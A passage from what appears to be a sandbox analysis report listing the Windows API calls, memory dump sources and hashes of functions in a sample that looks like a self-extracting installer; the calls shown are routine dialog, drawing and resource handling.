                                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                    • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                    • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                    • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                    • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                    • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                    • String ID:
                                                                    • API String ID: 3462224810-0
                                                                    • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                    • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                    • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                    • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                    APIs
                                                                    • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                    • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                    • GetMenu.USER32(?), ref: 0040202E
                                                                      • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                      • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                      • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                      • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                    • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                    • CoInitialize.OLE32(00000000), ref: 00402076
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                      • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                      • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                      • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                      • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                      • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                      • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                      • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                      • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                    • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                    • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                    • String ID: IMAGES$STATIC
                                                                    • API String ID: 4202116410-1168396491
                                                                    • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                    • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                    • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                    • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                    APIs
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                    • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                    • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                    • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                    • SetFocus.USER32(00000000), ref: 00408C16
                                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                    • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                    • IsWindow.USER32(00000000), ref: 00408C89
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                    • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                    • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                      • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                    • String ID:
                                                                    • API String ID: 1057135554-0
                                                                    • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                    • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                    • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                    • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                                    • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                    • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                    • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                                    • GetParent.USER32(?), ref: 00407418
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                    • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                    • GetClientRect.USER32(?,?), ref: 0040753D
                                                                      • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                      • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                                    • ClientToScreen.USER32(?,?), ref: 00407446
                                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                    • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                    • String ID:
                                                                    • API String ID: 747815384-0
                                                                    • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                    • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                    • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                    • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: 0VA$SetEnvironment${\rtf
                                                                    • API String ID: 613200358-2390373888
                                                                    • Opcode ID: 5f69abe73fede9d2a459a4d68537a5c3b0656311ba0a352affad076d63a13dd1
                                                                    • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                    • Opcode Fuzzy Hash: 5f69abe73fede9d2a459a4d68537a5c3b0656311ba0a352affad076d63a13dd1
                                                                    • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                    • String ID:
                                                                    • API String ID: 801014965-0
                                                                    • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                    • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                    • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                    • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00407831
                                                                    • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                    • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                    • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                    • GetWindowDC.USER32(?), ref: 00407896
                                                                    • GetWindowRect.USER32(?,?), ref: 004078A3
                                                                    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                    • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                    • String ID:
                                                                    • API String ID: 2586545124-0
                                                                    • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                    • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                                    • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                    • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                      • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                    • wsprintfA.USER32 ref: 00403C31
                                                                    • wsprintfA.USER32 ref: 00403C5E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$wsprintf
                                                                    • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                    • API String ID: 2704270482-695273242
                                                                    • Opcode ID: 43c56f4e942220a01f92bfecbb82701e771cd757a9e603f1f42b475f4263353d
                                                                    • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                                    • Opcode Fuzzy Hash: 43c56f4e942220a01f92bfecbb82701e771cd757a9e603f1f42b475f4263353d
                                                                    • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                    • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                    • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                    • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                    • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$Focus
                                                                    • String ID:
                                                                    • API String ID: 3946207451-0
                                                                    • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                    • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                                    • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                    • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                    • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AddressLibraryLoadProc
                                                                    • String ID: hA$SetWindowTheme$uxtheme
                                                                    • API String ID: 324724604-1539679821
                                                                    • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                    • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                                    • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                    • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                    • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                    • GetDC.USER32(00000000), ref: 004076E7
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                    • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                    • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2693764856-0
                                                                    • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                    • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                                    • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                    • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 0040721C
                                                                    • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                    • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                    • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                    • SelectObject.GDI32(?,?), ref: 00407266
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                    • SelectObject.GDI32(?,?), ref: 004072A7
                                                                    • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
